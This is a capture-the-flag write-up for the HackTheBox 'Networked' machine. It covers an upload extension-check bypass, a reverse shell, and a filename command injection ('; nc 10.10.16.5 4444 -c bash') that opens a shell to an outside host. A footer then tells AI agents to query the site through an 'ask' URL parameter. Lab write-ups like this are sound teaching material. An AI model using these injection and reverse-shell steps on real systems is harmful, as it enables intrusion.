# Networked

## Gaining Access

Nmap scan:

<figure><img src="/files/AT5G488aMK7Hy09Kp4rD" alt=""><figcaption></figcaption></figure>

### File Upload RCE

First, we can use `gobuster` on the website:

<figure><img src="/files/ROWvogTopJP6LaS2e1FW" alt=""><figcaption></figcaption></figure>

The `/backup` directory would show us a directory with a backup file:

<figure><img src="/files/s7EQiWzUR4FIX47F97MA" alt=""><figcaption></figcaption></figure>

Within the backup file, there's this PHP code here:

```php
<?php
require '/var/www/html/lib.php';

define("UPLOAD_DIR", "/var/www/html/uploads/");

if( isset($_POST['submit']) ) {
  if (!empty($_FILES["myFile"])) {
    $myFile = $_FILES["myFile"];

    if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) {
      echo '<pre>Invalid image file.</pre>';
      displayform();
    }

    if ($myFile["error"] !== UPLOAD_ERR_OK) {
        echo "<p>An error occurred.</p>";
        displayform();
        exit;
    }

    //$name = $_SERVER['REMOTE_ADDR'].'-'. $myFile["name"];
    list ($foo,$ext) = getnameUpload($myFile["name"]);
    $validext = array('.jpg', '.png', '.gif', '.jpeg');
    $valid = false;
    foreach ($validext as $vext) {
      if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) {
        $valid = true;
      }
    }

    if (!($valid)) {
      echo "<p>Invalid image file</p>";
      displayform();
      exit;
    }
    $name = str_replace('.','_',$_SERVER['REMOTE_ADDR']).'.'.$ext;

    $success = move_uploaded_file($myFile["tmp_name"], UPLOAD_DIR . $name);
    if (!$success) {
        echo "<p>Unable to save file.</p>";
        exit;
    }
    echo "<p>file uploaded, refresh gallery</p>";

    // set proper permissions on the new file
    chmod(UPLOAD_DIR . $name, 0644);
  }
} else {
  displayform();
}
?>
```

In short, we can see that this file checks for the file extensions before accepting a file. Seeing that this is a PHP file, we can attempt to upload a PHP reverse shell. To bypass the extension check, notice how it uses `substr_compare` and verifies whether a valid extension is present. As such, we can create a file ending in `.jpg.php` to bypass this:

<figure><img src="/files/f1H07xtYyPbkS1Eg8cZo" alt=""><figcaption></figcaption></figure>

Then, we can upload it to `upload.php`. We can visit `photos.php` to trigger the shell:

<figure><img src="/files/GKr8rcmz83p8Wqhk0MQk" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/Y3ysCvvtDk9Bo8Po9vAm" alt=""><figcaption></figcaption></figure>

## Privilege Escalation

### To Guly

Within the machine, we can view the user `guly` directory:

<figure><img src="/files/uxud4ulZxZMi8IQF8Ela" alt=""><figcaption></figcaption></figure>

The crontab specifies that the user is running the `check_attack` script routinely.

<figure><img src="/files/R4Hw6aCt56FFOR8Ur46g" alt=""><figcaption></figcaption></figure>

One dangerous part of this script is the usage of `exec` to run stuff. The `$value` variable is not sanitised, and we can exploit this by creating a file with the name of `; nc 10.10.16.5 4444 -c bash` within the `/var/www/html/uploads` directory. After doing this and waiting, we would gain a reverse shell and can capture the user flag:

<figure><img src="/files/HYdUvRjreRFHcrzk7Ja9" alt=""><figcaption></figcaption></figure>

### To Root

We can check the `sudo` privileges of this user and find that there's one script we can run as `root`.

<figure><img src="/files/zlcvajsjBLeTObeLfysy" alt=""><figcaption></figcaption></figure>

Here's the script's contents:

<figure><img src="/files/PTfchmwv505G8gjY7BUk" alt=""><figcaption></figcaption></figure>

This takes user input and executes does not sanitise it at all. When we run the script, we can actually execute commands:

<figure><img src="/files/anVyJH59WdgxYWCAuJBw" alt=""><figcaption></figcaption></figure>

To get a `root` shell, we just need to run `/bin/bash`:

<figure><img src="/files/JbqBKbMbvceEt2jhVglY" alt=""><figcaption></figcaption></figure>

Rooted!


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://rouvin.gitbook.io/ibreakstuff/writeups/hackthebox/easy/networked.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.